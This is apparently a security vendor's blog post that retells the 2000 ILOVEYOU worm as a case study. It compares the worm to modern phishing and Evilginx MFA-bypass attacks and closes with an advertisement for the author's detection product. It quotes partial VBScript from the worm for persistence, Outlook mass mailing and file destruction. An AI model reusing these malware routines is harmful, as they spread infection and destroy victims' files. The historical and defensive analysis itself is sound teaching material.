A Love Letter That Broke the Internet: The ILOVEYOU Worm, 26 Years Later
Valentine's Day is this Saturday. You're going to get flooded with emails and messages from people telling you they love you, sending you cards, sending you links to gifts. Some of those messages are going to be real. Some of them are not. And if you think that's a new problem, let me take you back 26 years to when three little words brought the entire internet to its knees.
May 4th, 2000. A Friday morning. People all over the world opened their email, saw a message from somebody they trusted with the subject line "ILOVEYOU," and clicked the attachment. That was it. That was the whole attack. One click. Within hours, ten million machines were compromised. The Pentagon shut down email. The CIA shut down email. The British Parliament shut down email. Ford, AT&T, Microsoft, all dark. Fifty million infections inside of ten days. Somewhere between $10 and $15 billion in damage.
The whole thing was written by a 24 year old college dropout in the Philippines who wanted to steal dial up internet passwords because he couldn't afford to pay for access.
I've been doing this work since before we called it cybersecurity. I was working in this space when most people didn't even have an email address yet. And I still teach this worm because it remains one of the best case studies ever written on how simple code combined with human nature can bring the world to a complete stop.
So with Valentine's Day coming up, let's rip this thing apart. Because 26 years later, the love letter has changed, but the game hasn't.
The Setup: Social Engineering Before We Had a Name for It
The infection vector was an email. That's it. No exploit kit. No zero day. No sophisticated tooling. Just an email.
From: [someone in your address book]
Subject: ILOVEYOU
Body: kindly check the attached LOVELETTER coming from me.
Attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
Here's the trick that made it lethal: Windows hid known file extensions by default. Users didn't see LOVE-LETTER-FOR-YOU.TXT.vbs on their screen. They saw LOVE-LETTER-FOR-YOU.TXT. Looked like a text file. Came from someone they knew. They double clicked it.
Windows Script Host, which was enabled by default on every Windows machine in 2000, picked up the .vbs extension and executed the script through wscript.exe. No elevation prompt. No sandbox. No warning dialog. The operating system just ran the code. Full trust. No questions asked.
Sound familiar? It should.
Step 1: Self Replication
The moment the script executed, it copied itself to three locations on the local machine:
Set fso = CreateObject("Scripting.FileSystemObject")
fso.CopyFile dirsystem & "\MSKernel32.vbs", dirwin & "\Win32DLL.vbs"
fso.CopyFile dirsystem & "\LOVE-LETTER-FOR-YOU.TXT.vbs", dirsystem & "\MSKernel32.vbs"The copies landed as:
\Windows\Win32DLL.vbs\Windows\System\MSKernel32.vbs\Windows\System\LOVE-LETTER-FOR-YOU.TXT.vbs
Those filenames were chosen deliberately. MSKernel32? Win32DLL? Nobody in 2000 was going to look at those sitting in a System directory and think twice about them.
Step 2: Registry Persistence
Next the worm wrote registry keys to survive a reboot:
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32", _
dirwin & "\system\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Win32DLL", _
dirwin & "\Win32DLL.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL", _
dirwin & "\Win32DLL.vbs"Classic Run and RunServices autostart persistence. Every time the machine rebooted, the worm fired right back up. This maps directly to MITRE ATT&CK T1547.001, Boot or Logon Autostart Execution via Registry Run Keys. We still see attackers using this exact technique today. Twenty six years and counting.
Step 3: Browser Hijack and Trojan Download
Here's where de Guzman showed his actual intent. The worm changed the Internet Explorer home page to point to one of four URLs hosted on Sky Internet, a Philippine ISP. Those URLs triggered the download of a trojan called WIN-BUGSFIX.exe.
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", _
downaddr
The worm randomly selected from four download URLs. Once WIN-BUGSFIX.exe downloaded and ran, it registered itself as WinFAT32.exe in the system directory and added itself to the Run key for persistence.
This trojan was the real payload. A password stealer. It hunted for cached credentials, particularly dial up networking passwords and email credentials, and tried to exfiltrate them to a mailbox controlled by the attacker at mailme@super.net.ph.
Here's the irony. De Guzman submitted an undergraduate thesis proposing exactly this concept. He argued that internet access should be a human right and that stealing dial up passwords from people who could afford them wasn't really stealing. His college rejected the thesis and called it "illegal." He dropped out. And then he built it anyway.
Step 4: The Email Storm
This is the part that broke the internet. The worm accessed the victim's Microsoft Outlook address book through COM automation and sent a copy of itself to every single contact:
Set out = CreateObject("Outlook.Application")
Set mapi = out.GetNameSpace("MAPI")
For Each addressList In mapi.AddressLists
x = 1
For Each entry In addressList.AddressEntries
entryAddress = entry.Address
' Check if already emailed this person
If (regRead = "") Then
Set mail = out.CreateItem(0)
mail.Recipients.Add(entryAddress)
mail.Subject = "ILOVEYOU"
mail.Body = vbcrlf & "kindly check the attached LOVELETTER coming from me."
mail.Attachments.Add(dirsystem & "\LOVE-LETTER-FOR-YOU.TXT.vbs")
mail.Send
' Mark address as sent
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\" & _
entryAddress, 1, "REG_DWORD"
End If
x = x + 1
Next
NextLet me point out a few things about this.
It tracked who it already emailed. The worm created a registry key under HKEY_CURRENT_USER\Software\Microsoft\WAB\ for each address it sent to. Before sending, it checked if that key existed. If it did, it skipped that contact. This wasn't about being stealthy. It was about being efficient. It didn't want to waste time double sending when it could be spreading to new targets.
Every email came from someone you knew. The worm used the victim's actual Outlook instance and their real address book. Every recipient got a message from a trusted sender. In 2000 there was no SPF, no DKIM, no DMARC. There was no concept of "verify the sender." If it said it was from your coworker, it was from your coworker.
There was zero throttling. If you had 200 contacts, 200 emails went out immediately. If those 200 people each had 200 contacts, that's 40,000 emails in the second wave. Third wave? Eight million. The math was exponential and it hit like a freight train.
Step 5: IRC Propagation
Email wasn't the only vector. The worm also targeted mIRC, which was the dominant chat client in 2000. It searched every drive for mIRC installation files and when it found them, it overwrote script.ini with code that auto sent the worm to anyone joining a channel the infected user was in.
This gave it a completely independent propagation path outside of email. Two vectors, one worm.
Step 6: File Destruction
This is where the real human cost landed. The worm scanned every fixed and network mapped drive on the system and systematically destroyed files based on their extension:
If ext = "vbs" Or ext = "vbe" Then
' Overwrite with worm code, original destroyed
Set ap = fso.OpenTextFile(f1.path, 2, True)
ap.Write vbscopy
ap.Close
ElseIf ext = "js" Or ext = "jse" Or ext = "css" Or ext = "wsh" Or _
ext = "sct" Or ext = "hta" Then
' Create .vbs copy, delete original
Set ap = fso.OpenTextFile(f1.path & ".vbs", 2, True)
ap.Write vbscopy
ap.Close
fso.DeleteFile(f1.path)
ElseIf ext = "jpg" Or ext = "jpeg" Then
' Create .vbs copy, delete original image
Set ap = fso.OpenTextFile(f1.path & ".vbs", 2, True)
ap.Write vbscopy
ap.Close
fso.DeleteFile(f1.path)
ElseIf ext = "mp3" Or ext = "mp2" Then
' Create .vbs copy, hide original (not deleted)
Set ap = fso.OpenTextFile(f1.path & ".vbs", 2, True)
ap.Write vbscopy
ap.Close
fso.GetFile(f1.path).Attributes = 2 ' Hidden
End IfHere's the damage breakdown by file type:
Destroyed permanently: .vbs, .vbe files were overwritten with the worm's own source code.
Replaced and deleted: .js, .jse, .css, .wsh, .sct, .hta, .jpg, .jpeg files got a .vbs copy created with the same name, and the originals were deleted. Gone forever.
Replaced and hidden: .mp3 and .mp2 files got the same .vbs treatment, but the originals were only hidden, not deleted. If you knew to change the file attributes back, you could recover your music. Small consolation.
People lost family photos. They lost documents. They lost years of work. And because the worm wrote its own source code over those files, there was no recovery. The data was simply gone. The worm also scanned across network mapped drives, which meant in a corporate environment, one infected workstation could wipe out files on shared drives and multiply the damage across an entire organization.
The Timeline: How Fast It Moved
The speed is what made this historic.
The worm launched from the Pandacan neighborhood of Manila on Friday morning, May 4, 2000, local time. It moved westward, following the business day around the globe:
Hours 0 through 2: Infections explode across Manila and spread to Hong Kong as offices open.
Hours 3 through 6: Europe comes online. The worm rips through corporate email systems in the UK, Germany, and France.
Hours 6 through 10: The United States wakes up. By mid morning Eastern time, organizations across the country are getting hammered.
Within 24 hours: An estimated 45 to 50 million machines infected worldwide.
The only way to stop the bleeding was to shut down email entirely. And that's exactly what happened. The Pentagon, the CIA, the British Parliament, Ford, AT&T, Microsoft. All of them pulled the plug on their mail servers because there was no other option.
Within 10 days, damage estimates hit $10 billion. Some analyses pushed that to $15 billion when you factored in lost productivity, data recovery, and operational downtime.
All from a 10KB VBScript file written by one kid. No command and control infrastructure. No lateral movement framework. No exploit chain. Just a script, an email, and human curiosity.
What Happened to the Guy Who Wrote It
Onel de Guzman was identified within days. The Philippine National Bureau of Investigation traced the worm through Sky Internet's servers and arrested de Guzman along with an associate named Reonel Ramones.
And then nothing happened.
The Philippines had no laws against writing malware in 2000. There was literally no statute under which to charge them. All charges were dropped. The Philippine Congress passed the E-Commerce Law in July 2000 to close the gap, but it couldn't be applied retroactively.
De Guzman vanished from public life for 20 years. In 2020, a journalist tracked him down working at a mobile phone repair stall in Manila.
So Could This Happen Today?
So, this is the question I get asked every time I teach this, and the answer is more complicated than you think.
Could the exact same worm work? No. Modern versions of Outlook block dangerous attachment types. Windows Script Host is locked down. Email gateways would catch a mass mailing VBScript in seconds. EDR would flag the file system enumeration and registry modifications before the worm finished its first pass.
But could the same attack pattern work? Absolutely. And it does. Every single day.
Think about what ILOVEYOU actually was at its core. Strip away the VBScript and the Outlook COM automation and look at the skeleton of the attack:
- A message arrives from someone you trust
- It contains something that looks legitimate but isn't
- You interact with it because you have no reason not to
- It executes in the context of your identity and your access
- It spreads using your trust relationships
- It causes damage before anyone realizes what happened
Does that sound familiar? Because it should. That is exactly what phishing is. That is exactly what business email compromise is. That is exactly what credential theft campaigns do.
And here's where it gets really uncomfortable for people running modern security stacks. Social engineering and phishing are still the number one initial access vector in breaches. Not zero days. Not nation state exploit chains. Phishing. A human being getting tricked into doing something they shouldn't.
We have spent billions of dollars on security technology since 2000 and the fundamental attack that brought down the internet 26 years ago still works. The wrapper is different. The underlying principle is identical.
The Modern Love Letter: Evilginx and the MFA Bypass Problem
Let me give you a perfect modern example. Evilginx.
Evilginx is a adversary in the middle (AiTM) attack framework that sits between the victim and a legitimate login page. The victim gets a phishing link, usually from someone they trust (sound familiar?), clicks it, and lands on what looks exactly like their real Microsoft 365 or Google login page. They type in their username and password. They approve the MFA push. And Evilginx captures everything, including the session token that gets generated after successful authentication.
The attacker now has a fully authenticated session. They don't need the password. They don't need to deal with MFA. They already have the golden ticket. They walk right into the environment as the user.
This is ILOVEYOU in 2026. Different technology, same playbook. Trust is the vulnerability. The human is the attack surface. And once you're in, you're in.
Most security tools don't catch this because they see a valid session token from a legitimate authentication flow. The credentials were real. The MFA was approved by the actual user. From the identity provider's perspective, everything looks normal.
This is exactly the problem we built MILBERT to solve.
MILBERT monitors authentication telemetry in real time, processing 6,380 authentication events per second per MILBERT. It doesn't care whether the session token was generated through a legitimate login or an Evilginx proxy. It watches the behavioral patterns around the authentication event, the session characteristics, the impossible travel, the device fingerprint anomalies, the timing patterns that indicate a hijacked session versus a real one.
MILBERT was specifically designed to catch what ILOVEYOU's grandchildren are doing today: using trust and human behavior to bypass the technical controls that are supposed to keep attackers out.
26 Years Later: What's Better and What's Worse
Let's be honest about where we are.
What's better: Email gateways catch known malicious attachments. EDR exists. Operating systems have sandboxing and UAC and script execution controls. We have SPF and DKIM and DMARC for email authentication. Security awareness training is a billion dollar industry. We can detect and respond to most known attack patterns faster than ever.
What's worse: The attacks have gotten exponentially more sophisticated while the fundamental vulnerability, the human being, hasn't changed at all. Generative AI is being used to craft phishing emails that are indistinguishable from legitimate communication. Adversary in the middle frameworks like Evilginx make MFA bypassable with commodity tooling. Session hijacking is becoming the default post authentication attack. And organizations are drowning in so many alerts and dashboards and tools that they can't see the actual threats moving through their environment.
In 2000, ILOVEYOU was plaintext VBScript that gave every victim a copy of its own source code. Today's attackers obfuscate everything, use legitimate cloud infrastructure for C2, live off the land with native OS tools, and operate with a level of operational security that would impress most intelligence agencies.
The attack surface has grown by orders of magnitude. We went from email on desktops to email on phones and tablets and watches, plus Slack, plus Teams, plus OAuth apps, plus API integrations, plus cloud infrastructure, plus supply chain dependencies. Every one of those is a trust relationship. Every one of those is a potential love letter waiting to be opened.
The Lesson
Here's what I tell every room I speak to, whether it's VETCON or a boardroom.
ILOVEYOU didn't succeed because it was technically brilliant. A college kid wrote it in VBScript. It succeeded because it understood something that every attacker since has understood: people trust people. And when you can impersonate someone trusted, or hijack someone's identity, or proxy through someone's authenticated session, all the firewalls and endpoint protection and MFA in the world won't save you.
The technology changes every year. The human doesn't.
So this Valentine's Day, when you get that email from someone you know, with a link you weren't expecting, from a sender that looks right but something feels slightly off? Trust your gut.
Because the love letter looks different now, but it's still the same game. And 26 years later, it still works.
James McMurry is the CEO and founder of ThreatHunter.ai, providing 24/7 managed threat hunting services since 2007. He created MILBERT.ai, which detects MFA bypass attacks, session hijacking, and Evilginx campaigns in real time with zero false positives. He is also the co-founder of VETCON, the largest military veteran to cybersecurity transition program in the United States, serving 2,500 active duty service members and veterans annually at DEFCON.